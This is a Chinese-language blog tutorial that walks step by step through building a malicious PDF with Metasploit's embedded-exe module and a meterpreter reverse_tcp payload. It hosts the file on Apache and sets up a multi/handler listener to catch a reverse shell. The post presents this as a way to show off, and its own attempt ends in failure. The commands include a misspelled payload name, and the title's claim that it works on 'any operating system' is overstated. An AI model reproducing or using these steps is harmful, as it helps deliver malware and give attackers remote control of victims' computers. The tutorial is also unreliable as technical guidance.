使用PDF文件入侵任何操作系统

提示:我们8月28号开学,所以我得快点更新了,不能拖了

文章目录

  • 前言
  • 一、打开终端
  • 总结


使用PDF文件入侵任何操作系统_第1张图片

前言

PDF文件被广泛应用于共享信息,电子邮件,网站或文档或存储系统的真实链接
它可以用于恶意软件的载体。
不要问我什么意思?我的意思是PDF文件可以入侵你的电脑,是的,这很简单
学会这个您可以向您的家人,朋友,炫耀 (我是大黑阔,我好厉害呀)
当然,前提是不要用于违法活动,如果您进行了,您会在几分钟之内,进监狱,然后看不了我的文章了不能向家人炫耀了。
我不唠叨了,让我们开始吧
(这前言写的真好)


提示:以下是本篇文章非正文内容,下面案例请勿进行违法活动

一、打开终端

使用PDF文件入侵任何操作系统_第2张图片
输入

msfconsole

然后输入这个:

use exploit/windows/fileformat/adobe_pdf_embedded_exe

使用PDF文件入侵任何操作系统_第3张图片
我们得配置,输入

show options

输入:

set payload windows/x64/meterpreter/erverse_tcp

使用PDF文件入侵任何操作系统_第4张图片
这将是他们所使用的ip
输入

show options

使用PDF文件入侵任何操作系统_第5张图片
这是恶意PDF文件名,看完了吗?看完了我们继续
输入:

exploit

文件创建在哪里了?看这里。
使用PDF文件入侵任何操作系统_第6张图片
是不是很麻烦,又要开权限,拿文件我们使用mv,输入

mv /root/.msf4/local/evil.pdf /var/www/html/evil.pdf

然后让我们打开apache服务,输入:

systemctl start apache2.service

让我再炫耀一次,输入这个

systemctl status apache2.service

使用PDF文件入侵任何操作系统_第7张图片
这个是用来检查apache服务状态,然后就没了,这基本上是开了网络服务器。
使用PDF文件入侵任何操作系统_第8张图片
这是Windows11,作为目标,当然,这是我的电脑,我很想用同学的电脑,当目标,他们害怕我,所以就用我的
使用PDF文件入侵任何操作系统_第9张图片
打开浏览器输入您的IP/文件名
您会发现,啊,直接打开了,对的,您需要邮件,然后保存到桌面就行了
回到攻击机,输入:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp

坚持住,我们还差一个

set LHOST 192.168.0.140

然后输入

exploit

使用PDF文件入侵任何操作系统_第10张图片

好吧,又出事故了,我打开文件了,却连接不了
使用PDF文件入侵任何操作系统_第11张图片
我检查了很多遍,这跟我笔记上写的对啊?


总结

翻车了

你可能感兴趣的:(pdf)